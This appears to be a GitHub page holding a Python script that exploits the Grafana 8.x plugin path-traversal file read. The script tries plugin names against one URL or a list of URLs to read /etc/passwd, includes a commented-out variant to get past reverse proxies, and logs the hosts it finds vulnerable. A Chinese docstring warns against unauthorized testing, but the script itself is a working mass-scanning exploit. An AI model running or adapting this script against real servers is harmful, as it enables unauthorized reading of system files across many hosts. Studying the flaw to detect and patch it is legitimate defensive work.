-
Notifications
You must be signed in to change notification settings - Fork 1
/
grafana_fileread.py
84 lines (75 loc) · 3.36 KB
/
grafana_fileread.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
import requests
import sys
import re
'''
请熟读网络安全法,禁止做非授权渗透测试
本工具具有单IP检测与多IP检测两种检测方式,每个URL通过枚举多个插件进行检测
插件通过加载plugins.txt进行,可自行添加删减
用法:
通过-u 指定URL
通过-f 指定文件
'''
def check(url):
with open("plugins.txt", 'r') as f:
for plugins in f.readlines():
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/../../../../../../../../../../../etc/passwd"
#绕过反代
#url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
}
try:
req = requests.post(url1, headers=header,timeout=(3,7))
a=req.text
if 'root' in a:
print(url+' '+'存在'+str.rstrip(plugins)+'插件,并存在漏洞!')
with open('grafana 8.x_fileread_vuln.txt', 'a+') as ff:
ff.write(url1 + '\n')
else:
print(url+' '+str.rstrip(plugins)+' '+'不存在漏洞!')
except:
print('[-]请求错误')
def file_check(files):
with open(files, 'r') as f:
for url in f.readlines():
with open("plugins.txt", 'r') as f:
for plugins in f.readlines():
url =url.replace('\n','')
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/../../../../../../../../../../../etc/passwd"
#绕过反代
#url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
}
try:
req = requests.post(url1, headers=header,timeout=(3,7))
a=req.text
if 'root' in a:
print(url+' '+'存在'+str.rstrip(plugins)+'插件,并存在漏洞!')
with open('grafana 8.x_fileread_vuln.txt', 'a+') as ff:
ff.write(url1 + '\n')
else:
print(url+' '+str.rstrip(plugins)+' '+'不存在漏洞!')
except:
print('[-]请求错误')
def help():
print(' ')
print('[+] python3 grafana_fileread.py -h 查看帮助 ')
print('[+] python3 grafana_fileread.py -u http://127.0.0.1:3000 验证单个URL ')
print('[+] python3 grafana_fileread.py -f file.txt 批量验证URL ')
if __name__=="__main__":
try:
print('')
cmd1 = sys.argv[1]
if cmd1 == '-h':
help()
elif cmd1 == '-u':
cmd2 = sys.argv[2]
check(cmd2)
elif cmd1 == '-f':
cmd2 = sys.argv[2]
file_check(cmd2)
else:
print('[-]请输入正确的参数,或者-h查看帮助')
except:
print('[-]请输入-h查看帮助')